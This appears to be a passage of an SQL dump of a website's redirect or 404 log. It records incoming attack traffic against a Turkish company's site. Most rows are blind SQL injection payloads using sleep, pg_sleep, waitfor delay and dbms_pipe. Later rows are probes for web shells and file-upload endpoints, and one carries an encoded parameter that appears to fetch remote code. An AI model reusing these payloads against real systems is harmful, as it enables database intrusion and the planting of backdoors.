))+char(113)+char(112)+char(122)+char(118)+char(113)))/**/and	(\'ngbm\'/**/like	\'ngbm&type=rss',NULL,'','',1,0,'2024-06-17 05:46:25','0000-00-00 00:00:00',301),(35228,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	5759/**/in	(select	(char(113)+char(122)+char(106)+char(107)+char(113)+(select	(case	when	(5759/**/like	5759)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(112)+char(122)+char(118)+char(113)))/**/and	\'glki\'/**/like	\'glki&type=rss',NULL,'','',1,0,'2024-06-17 05:46:26','0000-00-00 00:00:00',301),(35229,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	5759/**/in	(select	(char(113)+char(122)+char(106)+char(107)+char(113)+(select	(case	when	(5759/**/like	5759)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(112)+char(122)+char(118)+char(113)))/**/and	(3239/**/between	3239/**/and	3239&type=rss',NULL,'','',1,0,'2024-06-17 05:46:28','0000-00-00 00:00:00',301),(35230,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	5759/**/in	(select	(char(113)+char(122)+char(106)+char(107)+char(113)+(select	(case	when	(5759/**/between	5759)/**/and	5759)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(112)+char(122)+char(118)+char(113)))&type=rss',NULL,'','',1,0,'2024-06-17 05:46:29','0000-00-00 00:00:00',301),(35231,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	5759/**/in	(select	(char(113)+char(122)+char(106)+char(107)+char(113)+(select	(case	when	(5759/**/between	5759)/**/and	5759)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(112)+char(122)+char(118)+char(113)))--/**/leih&type=rss',NULL,'','',1,0,'2024-06-17 05:46:30','0000-00-00 00:00:00',301),(35232,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	7868/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(122)||chr(106)||chr(107)||chr(113)||(select	(case	when	(7868/**/like	7868)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(112)||chr(122)||chr(118)||chr(113)||chr(62)))/**/from	dual	)/**/and	(\'uyma\'/**/like	\'uyma&type=rss',NULL,'','',1,0,'2024-06-17 05:46:32','0000-00-00 00:00:00',301),(35233,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	7868/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(122)||chr(106)||chr(107)||chr(113)||(select	(case	when	(7868/**/like	7868)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(112)||chr(122)||chr(118)||chr(113)||chr(62)))/**/from	dual	)/**/and	\'rian\'/**/like	\'rian&type=rss',NULL,'','',1,0,'2024-06-17 05:46:33','0000-00-00 00:00:00',301),(35234,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	7868/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(122)||chr(106)||chr(107)||chr(113)||(select	(case	when	(7868/**/like	7868)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(112)||chr(122)||chr(118)||chr(113)||chr(62)))/**/from	dual	)/**/and	(8491/**/between	8491/**/and	8491&type=rss',NULL,'','',1,0,'2024-06-17 05:46:34','0000-00-00 00:00:00',301),(35235,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7868/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(122)||chr(106)||chr(107)||chr(113)||(select	(case	when	(7868/**/like	7868)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(112)||chr(122)||chr(118)||chr(113)||chr(62)))/**/from	dual	)&type=rss',NULL,'','',1,0,'2024-06-17 05:46:36','0000-00-00 00:00:00',301),(35236,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7868/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(122)||chr(106)||chr(107)||chr(113)||(select	(case	when	(7868/**/like	7868)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(112)||chr(122)||chr(118)||chr(113)||chr(62)))/**/from	dual	)--/**/jjwz&type=rss',NULL,'','',1,0,'2024-06-17 05:46:37','0000-00-00 00:00:00',301),(35237,'https://www.3s-technologies.com.tr/en/?format=(select	concat(concat(\'qzjkq\',(case	when	(4516/**/like	4516)/**/then	\'1\'/**/else	\'0\'/**/end	)),\'qpzvq\'))&type=rss',NULL,'','',1,0,'2024-06-17 05:46:38','0000-00-00 00:00:00',301),(35238,'https://www.3s-technologies.com.tr/en/?format=feed\');select	dbms_pipe.receive_message(chr(81)||chr(105)||chr(78)||chr(88),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-17 05:46:50','0000-00-00 00:00:00',301),(35239,'https://www.3s-technologies.com.tr/en/?format=feed\';select	dbms_pipe.receive_message(chr(81)||chr(105)||chr(78)||chr(88),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-17 05:46:51','0000-00-00 00:00:00',301),(35240,'https://www.3s-technologies.com.tr/en/?format=feed);select	dbms_pipe.receive_message(chr(81)||chr(105)||chr(78)||chr(88),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-17 05:46:52','0000-00-00 00:00:00',301),(35241,'https://www.3s-technologies.com.tr/en/?format=feed;select	dbms_pipe.receive_message(chr(81)||chr(105)||chr(78)||chr(88),5)/**/from	dual	--&type=rss',NULL,'','',1,0,'2024-06-17 05:46:54','0000-00-00 00:00:00',301),(35242,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	(select	1331/**/from	(select(sleep(5)))jecr)/**/and	(\'ypje\'/**/like	\'ypje&type=rss',NULL,'','',1,0,'2024-06-17 05:46:55','0000-00-00 00:00:00',301),(35243,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	(select	1331/**/from	(select(sleep(5)))jecr)/**/and	\'cmrh\'/**/like	\'cmrh&type=rss',NULL,'','',1,0,'2024-06-17 05:46:56','0000-00-00 00:00:00',301),(35244,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	(select	1331/**/from	(select(sleep(5)))jecr)/**/and	(1857/**/between	1857/**/and	1857&type=rss',NULL,'','',1,0,'2024-06-17 05:46:57','0000-00-00 00:00:00',301),(35245,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	(select	1331/**/from	(select(sleep(5)))jecr)&type=rss',NULL,'','',1,0,'2024-06-17 05:46:59','0000-00-00 00:00:00',301),(35246,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	(select	1331/**/from	(select(sleep(5)))jecr)--/**/purv&type=rss',NULL,'','',1,0,'2024-06-17 05:47:00','0000-00-00 00:00:00',301),(35247,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	7211/**/like	(select	7211/**/from	pg_sleep(5))/**/and	(\'paec\'/**/like	\'paec&type=rss',NULL,'','',1,0,'2024-06-17 05:47:01','0000-00-00 00:00:00',301),(35248,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	7211/**/like	(select	7211/**/from	pg_sleep(5))/**/and	\'pype\'/**/like	\'pype&type=rss',NULL,'','',1,0,'2024-06-17 05:47:02','0000-00-00 00:00:00',301),(35249,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	7211/**/like	(select	7211/**/from	pg_sleep(5))/**/and	(1556/**/between	1556/**/and	1556&type=rss',NULL,'','',1,0,'2024-06-17 05:47:04','0000-00-00 00:00:00',301),(35250,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7211/**/between	(select	and	(select7211/**/from	pg_sleep(5))&type=rss',NULL,'','',1,0,'2024-06-17 05:47:05','0000-00-00 00:00:00',301),(35251,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	7211/**/between	(select	and	(select7211/**/from	pg_sleep(5))--/**/mhrj&type=rss',NULL,'','',1,0,'2024-06-17 05:47:06','0000-00-00 00:00:00',301),(35252,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(\'sbbt\'/**/like	\'sbbt&type=rss',NULL,'','',1,0,'2024-06-17 05:47:07','0000-00-00 00:00:00',301),(35253,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/waitfor/**/delay/**/\'0:0:5\'/**/and	\'apdj\'/**/like	\'apdj&type=rss',NULL,'','',1,0,'2024-06-17 05:47:09','0000-00-00 00:00:00',301),(35254,'https://www.3s-technologies.com.tr/en/?format=feed)/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(1594/**/between	1594/**/and	1594&type=rss',NULL,'','',1,0,'2024-06-17 05:47:10','0000-00-00 00:00:00',301),(35255,'https://www.3s-technologies.com.tr/en/?format=feed/**/waitfor/**/delay/**/\'0:0:5\'--/**/czrm&type=rss',NULL,'','',1,0,'2024-06-17 05:47:12','0000-00-00 00:00:00',301),(35256,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/and	8174/**/like	dbms_pipe.receive_message(chr(87)||chr(98)||chr(110)||chr(110),5)/**/and	(\'hkar\'/**/like	\'hkar&type=rss',NULL,'','',1,0,'2024-06-17 05:47:14','0000-00-00 00:00:00',301),(35257,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/and	8174/**/like	dbms_pipe.receive_message(chr(87)||chr(98)||chr(110)||chr(110),5)/**/and	\'hoko\'/**/like	\'hoko&type=rss',NULL,'','',1,0,'2024-06-17 05:47:15','0000-00-00 00:00:00',301),(35258,'https://www.3s-technologies.com.tr/en/?format=feed)/**/and	8174/**/like	dbms_pipe.receive_message(chr(87)||chr(98)||chr(110)||chr(110),5)/**/and	(4942/**/between	4942/**/and	4942&type=rss',NULL,'','',1,0,'2024-06-17 05:47:16','0000-00-00 00:00:00',301),(35259,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	8174/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(87)||chr(98)||chr(110)||chr(110),5)&type=rss',NULL,'','',1,0,'2024-06-17 05:47:17','0000-00-00 00:00:00',301),(35260,'https://www.3s-technologies.com.tr/en/?format=feed/**/and	8174/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(87)||chr(98)||chr(110)||chr(110),5)--/**/figm&type=rss',NULL,'','',1,0,'2024-06-17 05:47:19','0000-00-00 00:00:00',301),(35261,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/order	by	1--/**/lcsp&type=rss',NULL,'','',1,0,'2024-06-17 05:47:20','0000-00-00 00:00:00',301),(35262,'https://www.3s-technologies.com.tr/en/?format=feed\')/**/order	by	1129--/**/acqx&type=rss',NULL,'','',1,0,'2024-06-17 05:47:21','0000-00-00 00:00:00',301),(35263,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/order	by	1--/**/jthl&type=rss',NULL,'','',1,0,'2024-06-17 05:47:22','0000-00-00 00:00:00',301),(35264,'https://www.3s-technologies.com.tr/en/?format=feed\'/**/order	by	1353--/**/sjnh&type=rss',NULL,'','',1,0,'2024-06-17 05:47:24','0000-00-00 00:00:00',301),(35265,'https://www.3s-technologies.com.tr/en/?format=feed)/**/order	by	1--/**/hiaw&type=rss',NULL,'','',1,0,'2024-06-17 05:47:25','0000-00-00 00:00:00',301),(35266,'https://www.3s-technologies.com.tr/en/?format=feed)/**/order	by	6279--/**/qpfd&type=rss',NULL,'','',1,0,'2024-06-17 05:47:26','0000-00-00 00:00:00',301),(35267,'https://www.3s-technologies.com.tr/en/?format=feed/**/order	by	1--/**/didj&type=rss',NULL,'','',1,0,'2024-06-17 05:47:28','0000-00-00 00:00:00',301),(35268,'https://www.3s-technologies.com.tr/en/?format=feed/**/order	by	7973--/**/ncfk&type=rss',NULL,'','',1,0,'2024-06-17 05:47:29','0000-00-00 00:00:00',301),(35269,'https://www.3s-technologies.com.tr/en/?format=feed/**/order	by	1--/**/nvyl&type=rss',NULL,'','',1,0,'2024-06-17 05:47:30','0000-00-00 00:00:00',301),(35270,'https://www.3s-technologies.com.tr/en/?format=feed/**/order	by	9363--/**/tnge&type=rss',NULL,'','',1,0,'2024-06-17 05:47:32','0000-00-00 00:00:00',301),(35271,'https://www.3s-technologies.com.tr/tr/js',NULL,'','',2,0,'2024-06-20 09:45:44','0000-00-00 00:00:00',301),(35272,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/js',NULL,'','',2,0,'2024-06-20 09:45:45','0000-00-00 00:00:00',301),(35273,'http://3s-technologies.com.tr/en/wp-content/plugins/include.php',NULL,'www.google.com','',2,0,'2024-06-22 02:35:35','0000-00-00 00:00:00',301),(35274,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2024-06-25 00:03:47','0000-00-00 00:00:00',301),(35275,'https://3s-technologies.com.tr/service/html/form/view/contact.html',NULL,'https://3s-technologies.com.tr/tr/iletisim','',1,0,'2024-06-26 08:29:55','0000-00-00 00:00:00',301),(35276,'https://3s-technologies.com.tr/en/cmsmodules/medialibrary/cmspages/multifileuploader.ashx',NULL,'','',3,0,'2024-06-26 13:56:57','0000-00-00 00:00:00',301),(35277,'http://3s-technologies.com.tr/tr/��r��nler/',NULL,'','',1,0,'2024-06-26 14:34:57','0000-00-00 00:00:00',301),(35278,'https://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-blog?id=18&language=tr-tr',NULL,'','',7,0,'2024-06-30 19:30:46','0000-00-00 00:00:00',301),(35279,'http://3s-technologies.com.tr/en/wp-content/plugins/google-seo-rank/module.php',NULL,'www.google.com','',1,0,'2024-07-03 03:37:34','0000-00-00 00:00:00',301),(35280,'https://3s-technologies.com.tr/tr/iletisim',NULL,'https://3s-technologies.com.tr/tr/iletisim','',4,0,'2024-07-04 10:38:16','0000-00-00 00:00:00',301),(35281,'http://3s-technologies.com.tr/tr/components/com_jea/views/form/tmpl/edit.xml',NULL,'','',1,0,'2024-07-06 03:56:15','0000-00-00 00:00:00',301),(35282,'http://3s-technologies.com.tr/tr/templates/ultima-star/templatedetails.xml',NULL,'','',1,0,'2024-07-06 04:13:12','0000-00-00 00:00:00',301),(35283,'http://3s-technologies.com.tr/tr/_installation/language/si-lk/si-lk.xml',NULL,'','',1,0,'2024-07-06 05:15:23','0000-00-00 00:00:00',301),(35284,'http://3s-technologies.com.tr/tr/assets/accesson.php',NULL,'','',1,0,'2024-07-06 22:57:44','0000-00-00 00:00:00',301),(35285,'http://3s-technologies.com.tr/tr/wp-content/plugins/evalphp/accesson.php',NULL,'','',2,0,'2024-07-06 22:57:45','0000-00-00 00:00:00',301),(35286,'http://3s-technologies.com.tr/tr/bitrix/tools/accesson.php',NULL,'','',1,0,'2024-07-06 22:57:46','0000-00-00 00:00:00',301),(35287,'http://3s-technologies.com.tr/tr/wp-admin/maint/index.php',NULL,'','',234,0,'2024-07-07 01:32:02','0000-00-00 00:00:00',301),(35288,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/index.php',NULL,'','',37,0,'2024-07-07 01:35:03','0000-00-00 00:00:00',301),(35289,'http://3s-technologies.com.tr/tr/wp-includes/certificates/index.php',NULL,'','',56,0,'2024-07-07 01:35:47','0000-00-00 00:00:00',301),(35290,'http://3s-technologies.com.tr/tr/wp-content/themes/index.php',NULL,'','',221,0,'2024-07-07 01:36:13','0000-00-00 00:00:00',301),(35291,'http://3s-technologies.com.tr/tr/wp-includes/assets/index.php',NULL,'','',284,0,'2024-07-07 01:37:56','0000-00-00 00:00:00',301),(35292,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component',NULL,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component','',2,0,'2024-07-07 07:35:24','0000-00-00 00:00:00',301),(35293,'http://3s-technologies.com.tr/tr/components/com_engine/index.html',NULL,'','',1,0,'2024-07-08 23:43:57','0000-00-00 00:00:00',301),(35294,'http://3s-technologies.com.tr/tr/components/com_commod/index.html',NULL,'','',1,0,'2024-07-08 23:43:58','0000-00-00 00:00:00',301),(35295,'http://3s-technologies.com.tr/tr/components/com_rebuilder/index.html',NULL,'','',1,0,'2024-07-08 23:43:59','0000-00-00 00:00:00',301),(35296,'http://3s-technologies.com.tr/rest/v1/guest-carts/1/estimate-shipping-methods',NULL,'','',1,0,'2024-07-09 22:29:14','0000-00-00 00:00:00',301),(35297,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/blue.php?wall=zmlszv9wdxrfy29udgvudhmoj2gwcm4zdc1zcdfkm3jzlnbocccszmlszv9nzxrfy29udgvudhmoj2h0dhbzoi8vcmvudhj5lmnvlzzxywmzbjr5l3jhdycpkts=',NULL,'https://t.me/bads_community','',2,0,'2024-07-10 00:57:41','0000-00-00 00:00:00',301),(35298,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/h0rn3t-sp1d3rs.php',NULL,'https://t.me/bads_community','',2,0,'2024-07-10 00:57:41','0000-00-00 00:00:00',301),(35299,'https://3s-technologies.com.tr/en/wp-admin/css/colors/blue/blue.php?wall=zmlszv9wdxrfy29udgvudhmoj2gwcm4zdc1zcdfkm3jzlnbocccszmlszv9nzxrfy29udgvudhmoj2h0dhbzoi8vcmvudhj5lmnvlzzxywmzbjr5l3jhdycpkts=',NULL,'https://t.me/bads_community','',2,0,'2024-07-10 00:57:41','0000-00-00 00:00:00',301),(35300,'https://3s-technologies.com.tr/en/wp-admin/css/colors/blue/h0rn3t-sp1d3rs.php',NULL,'https://t.me/bads_community','',2,0,'2024-07-10 00:57:42','0000-00-00 00:00:00',301),(35301,'https://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=8&language=tr-tr',NULL,'','',6,0,'2024-07-10 05:42:46','0000-00-00 00:00:00',301),(35302,'https://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=38&language=tr-tr',NULL,'','',6,0,'2024-07-10 05:42:55','0000-00-00 00:00:00',301),(35303,'https://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-blog?id=17&language=tr-tr',NULL,'','',7,0,'2024-07-11 07:45:42','0000-00-00 00:00:00',301),(35304,'http://3s-technologies.com.tr/en/user/register',NULL,'http://3s-technologies.com.tr/en/contacts/','',1,0,'2024-07-12 04:11:21','0000-00-00 00:00:00',301),(35305,'https://3s-technologies.com.tr/en/node/add',NULL,'http://3s-technologies.com.tr/','',1,0,'2024-07-12 04:11:37','0000-00-00 00:00:00',301),(35306,'http://3s-technologies.com.tr/en/node/add',NULL,'http://3s-technologies.com.tr/','',1,0,'2024-07-12 04:11:38','0000-00-00 00:00:00',301),(35307,'http://3s-technologies.com.tr/en/wp-ldd.php?a=c',NULL,'http://www.google.com','',1,0,'2024-07-13 16:29:58','0000-00-00 00:00:00',301),(35308,'http://3s-technologies.com.tr/en/wp-admin/wp-add.php?a=c',NULL,'http://www.google.com','',1,0,'2024-07-13 16:30:31','0000-00-00 00:00:00',301),(35309,'http://3s-technologies.com.tr/en/wp-admin/wp-ldd.php?a=c',NULL,'http://www.google.com','',1,0,'2024-07-13 16:30:57','0000-00-00 00:00:00',301),(35310,'http://www.3s-technologies.com.tr/tr/public/static/admin/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/static/admin/hui/lib/webuploader/0.1.5/server/fileupload.php','',1,0,'2024-07-13 20:01:12','0000-00-00 00:00:00',301),(35311,'http://www.3s-technologies.com.tr/tr/public/back/widget/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/back/Widget/webuploader/0.1.5/server/fileupload.php','',1,0,'2024-07-13 20:01:22','0000-00-00 00:00:00',301),(35312,'http://www.3s-technologies.com.tr/tr/widget/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Widget/webuploader/0.1.5/server/fileupload.php','',1,0,'2024-07-13 20:01:25','0000-00-00 00:00:00',301),(35313,'http://www.3s-technologies.com.tr/tr/admin/lib/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/admin/lib/webuploader/server/fileupload.php','',1,0,'2024-07-13 20:01:53','0000-00-00 00:00:00',301),(35314,'http://www.3s-technologies.com.tr/tr/public/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/webuploader/0.1.5/server/fileupload.php','',1,0,'2024-07-13 20:01:58','0000-00-00 00:00:00',301),(35315,'http://3s-technologies.com.tr/tr/modules/simpleimportproduct/views/js/error.js',NULL,'','',1,0,'2024-07-13 20:16:46','0000-00-00 00:00:00',301),(35316,'http://3s-technologies.com.tr/en/un.php',NULL,'www.google.com','',16,0,'2024-07-19 04:11:52','0000-00-00 00:00:00',301),(35317,'https://3s-technologies.com.tr/en/un.php',NULL,'www.google.com','',15,0,'2024-07-19 04:11:56','0000-00-00 00:00:00',301),(35318,'http://3s-technologies.com.tr/en/foxx.php',NULL,'www.google.com','',13,0,'2024-07-19 04:11:59','0000-00-00 00:00:00',301),(35319,'https://3s-technologies.com.tr/en/foxx.php',NULL,'www.google.com','',13,0,'2024-07-19 04:12:03','0000-00-00 00:00:00',301),(35320,'http://3s-technologies.com.tr/en/js.php?get',NULL,'www.google.com','',13,0,'2024-07-19 04:12:07','0000-00-00 00:00:00',301),(35321,'https://3s-technologies.com.tr/en/js.php?get',NULL,'www.google.com','',13,0,'2024-07-19 04:12:10','0000-00-00 00:00:00',301),(35322,'http://3s-technologies.com.tr/en/wp-email.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:20','0000-00-00 00:00:00',301),(35323,'https://3s-technologies.com.tr/en/wp-email.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:23','0000-00-00 00:00:00',301),(35324,'http://3s-technologies.com.tr/en/fierza.php',NULL,'www.google.com','',13,0,'2024-07-19 04:12:27','0000-00-00 00:00:00',301),(35325,'https://3s-technologies.com.tr/en/fierza.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:30','0000-00-00 00:00:00',301),(35326,'http://3s-technologies.com.tr/en/load.php',NULL,'www.google.com','',19,0,'2024-07-19 04:12:33','0000-00-00 00:00:00',301),(35327,'https://3s-technologies.com.tr/en/load.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:36','0000-00-00 00:00:00',301),(35328,'http://3s-technologies.com.tr/en/alpha.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:40','0000-00-00 00:00:00',301),(35329,'https://3s-technologies.com.tr/en/alpha.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:43','0000-00-00 00:00:00',301),(35330,'http://3s-technologies.com.tr/en/tinyfilemanager.php',NULL,'www.google.com','',23,0,'2024-07-19 04:12:45','0000-00-00 00:00:00',301),(35331,'https://3s-technologies.com.tr/en/tinyfilemanager.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:48','0000-00-00 00:00:00',301),(35332,'http://3s-technologies.com.tr/en/filemanager.php',NULL,'www.google.com','',30,0,'2024-07-19 04:12:52','0000-00-00 00:00:00',301),(35333,'https://3s-technologies.com.tr/en/filemanager.php',NULL,'www.google.com','',11,0,'2024-07-19 04:12:54','0000-00-00 00:00:00',301),(35334,'http://3s-technologies.com.tr/en/manager.php',NULL,'www.google.com','',86,0,'2024-07-19 04:12:57','0000-00-00 00:00:00',301),(35335,'https://3s-technologies.com.tr/en/manager.php',NULL,'www.google.com','',11,0,'2024-07-19 04:13:00','0000-00-00 00:00:00',301),(35336,'http://3s-technologies.com.tr/en/wp-content.php',NULL,'www.google.com','',14,0,'2024-07-19 04:13:03','0000-00-00 00:00:00',301),(35337,'https://3s-technologies.com.tr/en/wp-content.php',NULL,'www.google.com','',11,0,'2024-07-19 04:13:07','0000-00-00 00:00:00',301),(35338,'http://3s-technologies.com.tr/en/wp-content/themes/alera/alpha.php',NULL,'www.google.com','',12,0,'2024-07-19 04:13:10','0000-00-00 00:00:00',301),(35339,'https://3s-technologies.com.tr/en/wp-content/themes/alera/alpha.php',NULL,'www.google.com','',10,0,'2024-07-19 04:13:13','0000-00-00 00:00:00',301),(35340,'http://3s-technologies.com.tr/en/lock360.php',NULL,'www.google.com','',27,0,'2024-07-19 04:13:17','0000-00-00 00:00:00',301),(35341,'https://3s-technologies.com.tr/en/lock360.php',NULL,'www.google.com','',12,0,'2024-07-19 04:13:20','0000-00-00 00:00:00',301),(35342,'https://3s-technologies.com.tr/en/.well-known/pki-validation/wp-signup.php',NULL,'www.google.com','',10,0,'2024-07-19 04:13:39','0000-00-00 00:00:00',301),(35343,'http://3s-technologies.com.tr/en/.well-known/wp-signup.php',NULL,'www.google.com','',10,0,'2024-07-19 04:13:42','0000-00-00 00:00:00',301),(35344,'https://3s-technologies.com.tr/en/.well-known/wp-signup.php',NULL,'www.google.com','',10,0,'2024-07-19 04:13:46','0000-00-00 00:00:00',301),(35345,'https://3s-technologies.com.tr/en/jindex.php',NULL,'www.google.com','',12,0,'2024-07-19 04:13:52','0000-00-00 00:00:00',301),(35346,'http://3s-technologies.com.tr/en/0o.php',NULL,'www.google.com','',11,0,'2024-07-19 04:13:56','0000-00-00 00:00:00',301),(35347,'https://3s-technologies.com.tr/en/0o.php',NULL,'www.google.com','',11,0,'2024-07-19 04:13:59','0000-00-00 00:00:00',301),(35348,'http://3s-technologies.com.tr/en/room.php',NULL,'www.google.com','',11,0,'2024-07-19 04:14:03','0000-00-00 00:00:00',301),(35349,'https://3s-technologies.com.tr/en/room.php',NULL,'www.google.com','',11,0,'2024-07-19 04:14:06','0000-00-00 00:00:00',301),(35350,'https://3s-technologies.com.tr/en/xd.php',NULL,'www.google.com','',2,0,'2024-07-19 04:14:14','0000-00-00 00:00:00',301),(35351,'http://3s-technologies.com.tr/en/adriv.php',NULL,'www.google.com','',11,0,'2024-07-19 04:14:17','0000-00-00 00:00:00',301),(35352,'https://3s-technologies.com.tr/en/adriv.php',NULL,'www.google.com','',11,0,'2024-07-19 04:14:20','0000-00-00 00:00:00',301),(35353,'http://3s-technologies.com.tr/en/gecko.php',NULL,'www.google.com','',42,0,'2024-07-19 04:14:24','0000-00-00 00:00:00',301),(35354,'https://3s-technologies.com.tr/en/gecko.php',NULL,'www.google.com','',10,0,'2024-07-19 04:14:27','0000-00-00 00:00:00',301),(35355,'http://3s-technologies.com.tr/en/tonant.php',NULL,'www.google.com','',11,0,'2024-07-19 04:14:31','0000-00-00 00:00:00',301),(35356,'https://3s-technologies.com.tr/en/tonant.php',NULL,'www.google.com','',11,0,'2024-07-19 04:14:34','0000-00-00 00:00:00',301),(35357,'https://3s-technologies.com.tr/en/b.php',NULL,'www.google.com','',12,0,'2024-07-19 04:14:41','0000-00-00 00:00:00',301),(35358,'https://3s-technologies.com.tr/en/config.php',NULL,'www.google.com','',12,0,'2024-07-19 04:15:03','0000-00-00 00:00:00',301),(35359,'http://3s-technologies.com.tr/en/wp-key.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:06','0000-00-00 00:00:00',301),(35360,'https://3s-technologies.com.tr/en/wp-key.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:10','0000-00-00 00:00:00',301),(35361,'http://3s-technologies.com.tr/en/wp-conctent.php',NULL,'www.google.com','',2,0,'2024-07-19 04:15:13','0000-00-00 00:00:00',301),(35362,'https://3s-technologies.com.tr/en/wp-conctent.php',NULL,'www.google.com','',2,0,'2024-07-19 04:15:17','0000-00-00 00:00:00',301),(35363,'http://3s-technologies.com.tr/en/flame.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:20','0000-00-00 00:00:00',301),(35364,'https://3s-technologies.com.tr/en/flame.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:24','0000-00-00 00:00:00',301),(35365,'http://3s-technologies.com.tr/en/wp-content/flame.php',NULL,'www.google.com','',10,0,'2024-07-19 04:15:27','0000-00-00 00:00:00',301),(35366,'https://3s-technologies.com.tr/en/wp-content/flame.php',NULL,'www.google.com','',10,0,'2024-07-19 04:15:30','0000-00-00 00:00:00',301),(35367,'http://3s-technologies.com.tr/en/lx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:33','0000-00-00 00:00:00',301),(35368,'https://3s-technologies.com.tr/en/lx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:37','0000-00-00 00:00:00',301),(35369,'http://3s-technologies.com.tr/en/wp-help.php',NULL,'www.google.com','',12,0,'2024-07-19 04:15:40','0000-00-00 00:00:00',301),(35370,'https://3s-technologies.com.tr/en/wp-help.php',NULL,'www.google.com','',11,0,'2024-07-19 04:15:43','0000-00-00 00:00:00',301),(35371,'http://3s-technologies.com.tr/en/un2.php?f=f',NULL,'www.google.com','',11,0,'2024-07-19 04:15:53','0000-00-00 00:00:00',301),(35372,'https://3s-technologies.com.tr/en/un2.php?f=f',NULL,'www.google.com','',11,0,'2024-07-19 04:15:56','0000-00-00 00:00:00',301),(35373,'http://3s-technologies.com.tr/en/wp-posts.php',NULL,'www.google.com','',11,0,'2024-07-19 04:16:00','0000-00-00 00:00:00',301),(35374,'https://3s-technologies.com.tr/en/wp-posts.php',NULL,'www.google.com','',11,0,'2024-07-19 04:16:03','0000-00-00 00:00:00',301),(35375,'https://3s-technologies.com.tr/en/xl.php',NULL,'www.google.com','',12,0,'2024-07-19 04:16:10','0000-00-00 00:00:00',301),(35376,'https://3s-technologies.com.tr/en/ww.php',NULL,'www.google.com','',11,0,'2024-07-19 04:16:16','0000-00-00 00:00:00',301),(35377,'http://3s-technologies.com.tr/en/testwp.php?wp=1',NULL,'www.google.com','',11,0,'2024-07-19 04:16:20','0000-00-00 00:00:00',301),(35378,'https://3s-technologies.com.tr/en/testwp.php?wp=1',NULL,'www.google.com','',11,0,'2024-07-19 04:16:23','0000-00-00 